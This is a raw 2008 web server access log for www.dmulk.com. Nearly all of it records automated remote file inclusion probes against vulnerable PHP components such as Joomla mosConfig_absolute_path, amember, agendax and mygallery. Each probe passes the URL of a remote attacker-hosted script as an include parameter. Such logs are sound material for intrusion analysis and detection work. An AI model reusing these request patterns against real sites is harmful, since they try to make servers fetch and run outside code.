74.53.40.2 - - [10/Feb/2008:05:07:49 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [10/Feb/2008:05:08:07 -0800] "GET /logs/access_080130.log//modules/agendax/addevent.inc.php?agendax_path=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [10/Feb/2008:05:08:07 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [10/Feb/2008:05:08:07 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.25.236.26 - - [10/Feb/2008:05:11:29 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.rwdshop.com/shop/skin1_swap/skin1_std/modules/Gift_Certificates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.25.236.26 - - [10/Feb/2008:05:11:29 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.rwdshop.com/shop/skin1_swap/skin1_std/modules/Gift_Certificates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.25.236.26 - - [10/Feb/2008:05:11:30 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.rwdshop.com/shop/skin1_swap/skin1_std/modules/Gift_Certificates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.125.161.218 - - [10/Feb/2008:05:12:52 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [10/Feb/2008:05:12:54 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.159.88.26 - - [10/Feb/2008:05:13:14 -0800] "GET /logs/access_071230.log//popup_window.php?site_isp_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.159.88.26 - - [10/Feb/2008:05:13:15 -0800] "GET //popup_window.php?site_isp_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.159.88.26 - - [10/Feb/2008:05:13:15 -0800] "GET /logs//popup_window.php?site_isp_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:05:14:23 -0800] "GET /logs/access_080121.log//amember//plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:05:14:30 -0800] "GET //amember//plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:14:30 -0800] "GET /logs/access_080120.log//myfunctions/mygallerybrowser.php?myPath=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:05:14:30 -0800] "GET /logs//amember//plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.192.66.20 - - [10/Feb/2008:05:15:25 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://vishalsingh.com/cms_//cache/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.66.20 - - [10/Feb/2008:05:15:28 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://vishalsingh.com/cms_//cache/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.66.20 - - [10/Feb/2008:05:15:35 -0800] "GET /logs/access_080120.log//components/com_performs/performs.php?mosConfig_absolute_path=http://vishalsingh.com/cms_//cache/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.238.26.185 - - [10/Feb/2008:05:15:49 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:05:15:58 -0800] "GET /logs/access_080120.log//amember//plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.213.194.42 - - [10/Feb/2008:05:16:13 -0800] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [10/Feb/2008:05:16:14 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [10/Feb/2008:05:16:14 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [10/Feb/2008:05:16:59 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:17:23 -0800] "GET /logs/access_080120.log//myfunctions/mygallerybrowser.php?myPath=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.159.213 - - [10/Feb/2008:05:18:22 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [10/Feb/2008:05:18:22 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [10/Feb/2008:05:18:22 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.71.9.25 - - [10/Feb/2008:05:19:50 -0800] "GET /logs/access_071230.log/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.71.9.25 - - [10/Feb/2008:05:19:50 -0800] "GET /index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.71.9.25 - - [10/Feb/2008:05:19:51 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.71.9.25 - - [10/Feb/2008:05:20:03 -0800] "GET /logs/access_071230.log/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.71.9.25 - - [10/Feb/2008:05:20:03 -0800] "GET /index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.71.9.25 - - [10/Feb/2008:05:20:04 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:21:01 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:21:01 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:21:01 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:05:21:07 -0800] "GET /logs/access_080120.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:21:11 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:21:11 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:21:11 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.65.2 - - [10/Feb/2008:05:21:18 -0800] "GET /logs/access_080120.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.21 - - [10/Feb/2008:05:22:00 -0800] "GET /bikes/CreSTOC07/?D=D HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:23:16 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:23:25 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.127.84.50 - - [10/Feb/2008:05:23:45 -0800] "GET /logs/access_071230.log/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.127.84.50 - - [10/Feb/2008:05:23:45 -0800] "GET /index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.127.84.50 - - [10/Feb/2008:05:23:46 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.180 - - [10/Feb/2008:05:24:13 -0800] "GET /logs/access_080108.log//login.php?dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.180 - - [10/Feb/2008:05:24:13 -0800] "GET //login.php?dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.180 - - [10/Feb/2008:05:24:13 -0800] "GET /logs//login.php?dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.213 - - [10/Feb/2008:05:24:33 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.53.111.239 - - [10/Feb/2008:05:25:33 -0800] "GET /allinurl:%22.php?include=%22https://211.53.111.239/.test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
211.53.111.239 - - [10/Feb/2008:05:25:33 -0800] "GET /logs/allinurl:%22.php?include=%22https://211.53.111.239/.test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:05:26:06 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?file=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:05:26:07 -0800] "GET //skin/zero_vote/error.php?file=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:05:26:07 -0800] "GET /logs//skin/zero_vote/error.php?file=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:05:26:15 -0800] "GET /logs/access_080120.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.179.90.59 - - [10/Feb/2008:05:26:22 -0800] "GET /logs/access_080120.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.160.42.74 - - [10/Feb/2008:05:26:22 -0800] "GET /logs/access_080120.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.58.242.138 - - [10/Feb/2008:05:26:55 -0800] "GET /logs/access_071230.log/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [10/Feb/2008:05:26:56 -0800] "GET /logs/access_071230.log/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [10/Feb/2008:05:26:57 -0800] "GET /index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:26:57 -0800] "GET /logs/access_080201.log//vbgsitemap/vbgsitemap-config.php?base=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:26:57 -0800] "GET //vbgsitemap/vbgsitemap-config.php?base=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:26:57 -0800] "GET /logs//vbgsitemap/vbgsitemap-config.php?base=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [10/Feb/2008:05:26:57 -0800] "GET /index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [10/Feb/2008:05:26:57 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [10/Feb/2008:05:26:57 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.97.199.252 - - [10/Feb/2008:05:27:05 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://mosquitomagnetreview.com/gallery2.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
209.97.199.252 - - [10/Feb/2008:05:27:05 -0800] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://mosquitomagnetreview.com/gallery2.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:27:07 -0800] "GET /logs/access_080201.log//vbgsitemap/vbgsitemap-config.php?base=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:27:07 -0800] "GET //vbgsitemap/vbgsitemap-config.php?base=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:27:07 -0800] "GET /logs//vbgsitemap/vbgsitemap-config.php?base=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:05:27:07 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?page=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:05:27:08 -0800] "GET //skin/zero_vote/error.php?page=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:05:27:08 -0800] "GET /logs//skin/zero_vote/error.php?page=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.58.242.138 - - [10/Feb/2008:05:27:12 -0800] "GET /logs/access_071230.log/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [10/Feb/2008:05:27:12 -0800] "GET /index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [10/Feb/2008:05:27:13 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [10/Feb/2008:05:27:13 -0800] "GET /logs/access_071230.log/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [10/Feb/2008:05:27:13 -0800] "GET /logs/access_071230.log/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [10/Feb/2008:05:27:16 -0800] "GET /index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [10/Feb/2008:05:27:16 -0800] "GET /index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [10/Feb/2008:05:27:17 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [10/Feb/2008:05:27:17 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.218.149.119 - - [10/Feb/2008:05:27:26 -0800] "GET /logs/access_071230.log/index.php?p=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [10/Feb/2008:05:27:27 -0800] "GET /index.php?p=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [10/Feb/2008:05:27:27 -0800] "GET /logs/index.php?p=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.203.223.3 - - [10/Feb/2008:05:28:04 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.3 - - [10/Feb/2008:05:28:04 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.3 - - [10/Feb/2008:05:28:04 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:05:28:08 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?id=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:05:28:10 -0800] "GET //skin/zero_vote/error.php?id=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.105.241.113 - - [10/Feb/2008:05:28:11 -0800] "GET /logs//skin/zero_vote/error.php?id=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.221.184.180 - - [10/Feb/2008:05:28:33 -0800] "GET /logs/access_080121.log//login.php?dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.238.26.185 - - [10/Feb/2008:05:29:07 -0800] "GET /logs/access_080121.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:29:41 -0800] "GET /logs/access_080122.log//vbgsitemap/vbgsitemap-config.php?base=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [10/Feb/2008:05:29:41 -0800] "GET /logs/access_080122.log//vbgsitemap/vbgsitemap-config.php?base=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.66.20 - - [10/Feb/2008:05:29:55 -0800] "GET /logs/access_080108.log//components/com_performs/performs.php?mosConfig_absolute_path=http://vishalsingh.com/cms_//cache/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.71.9.25 - - [10/Feb/2008:05:30:28 -0800] "GET /logs/access_071225.log/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.71.9.25 - - [10/Feb/2008:05:31:37 -0800] "GET /logs/access_071225.log/index.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.203.223.3 - - [10/Feb/2008:05:33:59 -0800] "GET /logs/access_080201.log/index.php?body=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.178.114.10 - - [10/Feb/2008:05:34:09 -0800] "GET /logs/access_080120.log////wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [10/Feb/2008:05:34:33 -0800] "GET /logs/access_071225.log////?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.71.9.25 - - [10/Feb/2008:05:35:00 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.71.9.25 - - [10/Feb/2008:05:35:01 -0800] "GET //?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 200 2962 "-" "libwww-perl/5.65" "www.dmulk.com"
213.71.9.25 - - [10/Feb/2008:05:35:04 -0800] "GET /logs//?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 200 33976 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.15.138 - - [10/Feb/2008:05:35:07 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
67.19.15.138 - - [10/Feb/2008:05:35:07 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
81.169.157.58 - - [10/Feb/2008:05:35:22 -0800] "GET /guestbook/admin.php?include_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.71.9.25 - - [10/Feb/2008:05:35:33 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.71.9.25 - - [10/Feb/2008:05:35:34 -0800] "GET //?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 200 2962 "-" "libwww-perl/5.65" "www.dmulk.com"
213.71.9.25 - - [10/Feb/2008:05:35:35 -0800] "GET /logs//?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 200 34678 "-" "libwww-perl/5.65" "www.dmulk.com"
195.199.215.57 - - [10/Feb/2008:05:35:43 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.127.84.50 - - [10/Feb/2008:05:37:13 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
